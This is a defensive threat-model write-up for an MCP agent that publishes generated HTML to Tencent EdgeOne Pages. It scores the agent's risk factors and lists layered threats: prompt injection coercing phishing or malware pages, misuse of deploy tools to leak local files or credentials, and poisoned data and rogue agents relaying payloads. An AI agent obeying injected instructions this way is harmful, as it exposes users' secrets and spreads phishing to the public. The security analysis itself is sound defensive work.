EdgeOne Pages MCP — agentic threat model
The EdgeOne Pages MCP agent presents a high-risk profile due to its ability to instantly publish arbitrary agent-generated content directly to the public internet, creating a direct vector for hosting phishing pages, malware, or unauthorized content under a user's account.
OWASP AIVSS score rationale
| Autonomy of Action | 0.80 | |
| Goal-Driven Planning | 0.30 | |
| Self-Modification | 0.10 | |
| Dynamic Tool Use | 0.70 | |
| Persistent Memory | 0.20 | |
| Contextual Awareness | 0.40 | |
| Dynamic Identity | 0.60 | |
| Multi-Agent Interactions | 0.50 | |
| Non-Determinism | 0.50 | |
| Opacity & Reflexivity | 0.40 |
Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.
MAESTRO 7-layer threat model
Per-layer threats for this agent. Layers tagged “not certain from listing” are general, caveated commentary where the public description didn’t pin that layer.
Not certain from the listing — The agent relies on external LLMs to generate the HTML/content. If the underlying model is reprogrammed or suffers from adversarial prompt injection, it can be coerced into generating malicious scripts, phishing templates, or defaced content to be deployed.
Not certain from the listing — The agent does not explicitly mention a vector database or RAG pipeline, but any data operations feeding into the HTML generation could be poisoned to inject malicious payloads into the deployed web pages.
The agent framework exposes highly sensitive tools ('deploy-html' and folder deployment) that can be easily misused by an orchestrator or via prompt injection to publish unauthorized files, sensitive local project directories, or credentials to the public web.
The agent interacts directly with Tencent EdgeOne's global CDN. The primary infrastructure threat is the exposure of local files during folder deployment and the consumption of the user's deployment credits/bandwidth, potentially leading to financial denial of service.
Not certain from the listing — There is no mention of built-in guardrails, content moderation, or logging to inspect the HTML content for malicious patterns (like credential harvesting forms) before deploying it to the live URL.
The agent operates using the user's EdgeOne account credentials to provision public URLs. There is a lack of fine-grained authorization controls to restrict what domains or subdomains the agent is allowed to publish to, risking brand reputation damage.
In a multi-agent ecosystem, another compromised or rogue agent could generate malicious payloads and pass them to this MCP agent to automatically distribute malware or phishing campaigns globally without human intervention.
MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).